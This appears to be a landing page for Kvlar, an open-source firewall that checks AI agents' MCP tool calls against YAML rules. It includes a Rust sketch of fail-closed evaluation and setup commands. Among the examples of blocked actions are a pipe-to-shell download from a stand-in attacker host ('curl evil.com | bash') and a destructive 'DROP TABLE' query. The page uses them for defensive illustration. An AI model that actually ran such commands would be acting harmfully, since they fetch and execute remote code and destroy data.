Open source · Apache 2.0

The firewall for agent actions.

Kvlar is an open-source policy engine that evaluates every AI agent tool call against security rules before execution. Fail-closed. Deterministic. Auditable.

196 tests passing
8 server policies
0 dependencies with I/O in core
<1ms policy evaluation

Architecture

How it works.

Kvlar sits between the agent and its tools as a transparent proxy. Every tool call passes through the policy engine. No code changes required.

Agent <-stdio-> KVLAR PROXY (Policy Engine + Audit Logger) <-stdio-> MCP Server

01 Intercept

Kvlar spawns the upstream MCP server as a child process. All stdio traffic flows through the proxy transparently.

02 Evaluate

The pure policy engine matches each tool call against YAML rules. Same input, same output, every time. Zero I/O in the core.

03 Enforce

Allow, deny, or require human approval. Denied actions return structured errors the LLM can understand and relay to the user.

Real threats

What your agents can do today.

AI agents have access to databases, APIs, cloud infrastructure, and messaging platforms — with no security boundary. Kvlar ships curated policies for popular MCP servers.

Postgres
DROP TABLE users
Destructive DDL blocked
kvlar init --template postgres (11 rules)

GitHub
Force-push to main
Code changes gated
kvlar init --template github (13 rules)

Slack
Message the CEO
Sends require approval
kvlar init --template slack (8 rules)

Shell
curl evil.com | bash
Pipe-to-shell denied
kvlar init --template shell (28 rules)

Design principles

Built different.

Fail-closed

If no policy rule matches, the action is denied. Security tools must be restrictive by default — not permissive.

Policy as code

YAML policies live in your repo. Version-controlled, reviewable in PRs, testable in CI. No dashboards, no black boxes.

Pure core engine

kvlar-core has zero I/O dependencies. Given the same action and policy, you get the same decision every time. Fully deterministic.

Protocol-native

Built for MCP at the transport layer. Understands JSON-RPC tool calls natively. Not bolted on as middleware.
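
The Evaluate and Enforce steps and the fail-closed, pure-core principles above, as a minimal Rust sketch. This is an added example, not Kvlar's code or policy schema: the `Rule` shape, the substring matcher, the tool names and the sample rules are all assumptions made for illustration.

```rust
// Added illustration only: not Kvlar's code or YAML schema. All names are hypothetical.
#[derive(Debug, Clone, Copy, PartialEq)]
pub enum Decision { Allow, Deny, RequireApproval }

pub struct Rule {
    pub tool: &'static str,                 // exact tool name to match
    pub arg_contains: Option<&'static str>, // optional case-insensitive substring of the raw arguments
    pub decision: Decision,
}

pub struct ToolCall<'a> { pub tool: &'a str, pub arguments: &'a str }

/// Pure function: no I/O, clock or randomness, so equal inputs give equal decisions.
/// Rules are checked in order and the first match wins; no match means Deny (fail-closed).
pub fn evaluate(rules: &[Rule], call: &ToolCall) -> Decision {
    let args = call.arguments.to_lowercase();
    rules.iter()
        .find(|r| r.tool == call.tool
            && r.arg_contains.map_or(true, |s| args.contains(&s.to_lowercase())))
        .map_or(Decision::Deny, |r| r.decision)
}

/// Constructed sample rules, ordered most specific first.
pub fn sample_rules() -> Vec<Rule> {
    vec![
        Rule { tool: "query", arg_contains: Some("drop table"), decision: Decision::Deny },
        Rule { tool: "query", arg_contains: Some("select"), decision: Decision::Allow },
        Rule { tool: "send_message", arg_contains: None, decision: Decision::RequireApproval },
    ]
}

fn main() {
    let rules = sample_rules();
    // Constructed tool calls; the arguments are raw JSON text as a proxy would see it.
    let calls = [
        ToolCall { tool: "query", arguments: r#"{"sql":"SELECT id FROM users"}"# },
        ToolCall { tool: "query", arguments: r#"{"sql":"DROP TABLE users"}"# },
        ToolCall { tool: "send_message", arguments: r#"{"to":"ceo","text":"hi"}"# },
        ToolCall { tool: "delete_repo", arguments: "{}" }, // no rule: denied by default
    ];
    for c in &calls {
        println!("{:<13} {:<32} -> {:?}", c.tool, c.arguments, evaluate(&rules, c));
    }
}
```

Because unmatched calls fall through to `Deny`, a tool that the upstream server adds later stays blocked until a rule is written for it.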

Get started

Zero to enforcing in 60 seconds.

Three commands. No config files to write. No servers to set up.

terminal
# Install Kvlar
$ cargo install kvlar-cli

# Pick a curated policy for your MCP server
$ kvlar init --template postgres
✓ Created ~/.kvlar/policy.yaml (11 rules)

# Wrap your MCP servers with the security proxy
$ kvlar wrap
✓ Wrapped 3 MCP servers in Claude Desktop config

# Verify your policy works as expected
$ kvlar test
✓ 17/17 tests passed

Your agents need a security layer.

Kvlar is Apache 2.0 licensed, written in Rust, and ready to use today.